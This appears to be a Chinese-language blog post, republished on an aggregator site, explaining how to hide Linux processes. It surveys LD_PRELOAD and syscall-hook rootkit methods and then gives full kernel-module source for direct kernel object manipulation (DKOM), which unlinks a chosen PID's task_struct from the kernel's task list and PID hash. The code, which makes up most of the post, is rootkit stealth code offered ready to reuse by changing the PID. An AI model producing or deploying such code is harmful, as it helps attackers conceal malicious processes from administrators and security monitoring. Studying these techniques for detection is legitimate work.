Linux 隐藏进程-Toy模板网

这篇具有很好参考价值的文章主要介绍了Linux 隐藏进程。希望对大家有所帮助。如果存在错误或未考虑完全的地方，请大家不吝赐教，您也可以点击"举报违法"按钮提交疑问。

一、隐藏进程的几种方法

用户级Rootkit 通过LD_PRELOAD来hook libc库,从而过滤/proc/pid目录
内核级rootkit 通过hook系统调用getdents/getdents64或者hook 文件file_operation的iterate
内核级rootkit把task_struct从相关链表摘除(init_task,pidlist)

关于第一种hook方式可以参考上一篇文章Linux LD_PRELOAD Hook

二、摘链隐藏

这种方式属于DKoM(Direct Kernel Object Manipulation)攻击方式了，即直接内核对象操作技术。这里直接贴上大佬总结好的博客链接： Linux系统下如何隐藏自己的进程？
实现代码：

#include <linux/module.h>
#include <linux/sched.h>

/*摘链隐藏代码，只需要修改想要隐藏pid号就可以了*/
void hide_process(void)
{
    /* Linux kernel version 4.x.x */
    // int pid = 2;
    // struct task_struct *task = NULL;
    // struct pid_link *link = NULL;
    // struct hlist_node *node = NULL;

    // task = pid_task(find_vpid(pid), PIDTYPE_PID);
    // link = &task->pids[PIDTYPE_PID];

    // list_del_rcu(&task->tasks);
    // INIT_LIST_HEAD(&task->tasks);
    // node = &link->node;
    // hlist_del_rcu(node);
    // INIT_HLIST_NODE(node);
    // node->pprev = &node;

    /* linx kernel version is 5.4.8 */
    int pid = 2;
    struct task_struct *task = NULL;
    struct hlist_node *node = NULL;

    task = pid_task(find_vpid(pid), PIDTYPE_PID);

    list_del_rcu(&task->tasks);
    INIT_LIST_HEAD(&task->tasks);
    node = &task->pid_links[PIDTYPE_PID];
    hlist_del_rcu(node);
    INIT_HLIST_NODE(node);
    node->pprev = &node;
}

/*还原链表，ps -aux仍然可以查看进程信息*/
static int restore_process(struct task_struct *task)
{
	struct hlist_node *node = NULL;
	struct pid *thread_pid = NULL;

	printk("Enter into restore process procedure!\n");

	hlist_add_head_rcu(&task->pid_links[PIDTYPE_PID], &task->thread_pid->tasks[PIDTYPE_PID]);
	list_add_tail_rcu(&task->tasks, &init_task.tasks);

	return 0;
}

static int __init test_init(void)
{
    hide_process();

    return -1;
}
 
static void __exit test_exit(void){
	
	printk(KERN_INFO "file --> %s function --> %s  line --> %d\n",__FILE__,__func__,__LINE__);
 
}
 
module_init(test_init);
module_exit(test_exit);
MODULE_LICENSE("GPL");
MODULE_AUTHOR("curtis li");